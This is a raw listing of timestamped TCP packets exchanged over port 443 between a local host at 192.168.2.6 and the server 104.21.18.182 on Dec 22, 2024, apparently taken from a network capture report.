                                                                                                            Dec 22, 2024 13:42:22.730245113 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.730304003 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.730312109 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.730343103 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.736536980 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.736557007 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.736644030 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.736644983 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.736660957 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.736712933 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.741408110 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.741425037 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.741489887 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.741497993 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.741575003 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.750391960 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.750408888 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.750487089 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.750502110 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.750575066 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.900715113 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.900758982 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.900790930 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.900835991 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.900870085 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.900892973 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.905868053 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.905884981 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.905967951 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.905983925 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.906042099 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.911197901 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.911214113 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.911278963 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.911293030 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.911343098 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.911343098 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.916655064 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.916671991 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.916735888 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.916750908 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.916812897 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.921761036 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.921782970 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.921828985 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.921843052 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.921874046 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.921902895 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.926491976 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.926508904 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.926567078 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.926580906 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.926636934 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.931998014 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.932013988 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.932081938 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.932096004 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.932183027 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.942709923 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.942728996 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.942831039 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.942845106 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.942900896 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.093096972 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.093117952 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.093173981 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.093192101 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.093219995 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.093241930 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.098093987 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.098110914 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.098174095 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.098189116 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.098254919 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.103562117 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.103598118 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.103634119 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.103647947 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.103696108 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.103696108 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.108359098 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.108381987 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.108436108 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.108450890 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.108504057 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.113893986 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.113910913 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.113966942 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.113981962 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.114028931 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.118921995 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.118937016 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.118997097 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.119012117 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.119055033 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.124264002 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.124280930 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.124365091 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.124380112 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.124438047 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.134773016 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.134789944 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.134860039 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.134874105 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.134905100 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.134927988 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.285621881 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.285641909 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.285736084 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.285757065 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.285788059 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.285810947 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.290374994 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.290393114 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.290493965 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.290508986 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.290585995 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.295865059 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.295882940 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.296262980 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.296277046 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.296333075 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.301265001 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.301280975 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.301371098 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.301384926 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.301485062 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.306027889 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.306045055 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.306154013 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.306168079 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.306245089 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.311779976 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.311794996 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.311853886 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.311867952 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.311923981 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.316701889 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.316721916 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.316803932 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.316822052 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.316879034 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.326994896 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.327018976 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.327065945 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.327083111 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.327107906 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.327135086 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.478069067 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.478086948 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.478161097 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.478215933 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.478281021 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.482640028 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.482672930 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.482709885 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.482727051 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.482752085 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.482799053 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.488398075 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.488419056 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.488481998 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.488497019 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.488542080 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.488632917 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.493710041 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.493736029 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.493818998 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.493834972 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.493863106 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.493880987 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.498231888 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.498251915 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.498297930 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.498311996 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.498338938 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.498358965 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.503999949 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.504021883 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.504194975 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.504210949 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.504281998 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.508917093 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.508939981 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.508996964 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.509011984 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.509042025 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.509138107 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.519167900 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.519210100 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.519284010 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.519299984 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.519344091 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.519471884 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.670281887 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.670314074 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.670387030 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.670420885 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.670443058 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.670517921 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.674925089 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.674947023 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.674988031 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.674997091 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.675024033 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.675054073 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.680418968 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.680439949 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.680505991 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.680521011 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.680553913 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.680574894 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.685703993 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.685724020 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.685779095 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.685792923 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.685820103 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.685841084 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.691488981 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.691509962 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.691586018 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.691627979 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.691663980 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.691679955 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.696233034 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.696254969 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.696299076 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.696311951 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.696345091 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.696367979 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.701196909 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.701215982 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.701260090 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.701273918 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.701306105 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.701327085 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.711234093 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.711256981 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.711373091 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.711395025 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.711446047 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.862262011 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.862286091 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.862377882 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.862404108 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.862421989 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.862488031 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.867960930 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.867980957 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.868076086 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.868086100 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.868125916 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.872867107 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.872899055 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.872948885 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.872956991 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.872997999 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.878192902 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.878213882 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.878273964 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.878287077 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.878314018 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.878334045 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.883363008 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.883385897 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.883493900 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.883507967 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.883568048 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.888745070 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.888767958 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.888809919 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.888822079 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.888866901 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.888886929 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.893922091 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.893943071 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.893996000 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.894009113 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.894038916 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.894057989 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.903364897 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.903398991 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.903431892 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.903462887 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:23.903491020 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:23.903512001 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:24.054244041 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:24.054270029 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:24.054371119 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:24.054402113 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:24.054450035 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:24.060101986 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:24.060126066 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:24.060204029 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:24.060211897 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:24.060237885 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:24.060261965 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:24.064726114 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:24.064747095 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:24.064846992 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:24.064856052 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:24.065171003 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:24.070189953 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:24.070210934 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:24.070285082 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:24.070296049 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:24.070324898 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:24.070352077 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:24.075407982 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:24.075428009 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:24.075479031 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:24.075490952 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:24.075525999 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:24.075546980 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:24.080471992 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:24.080492020 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:24.080594063 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:24.080607891 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:24.080667973 CET49720443192.168.2.6104.21.18.182
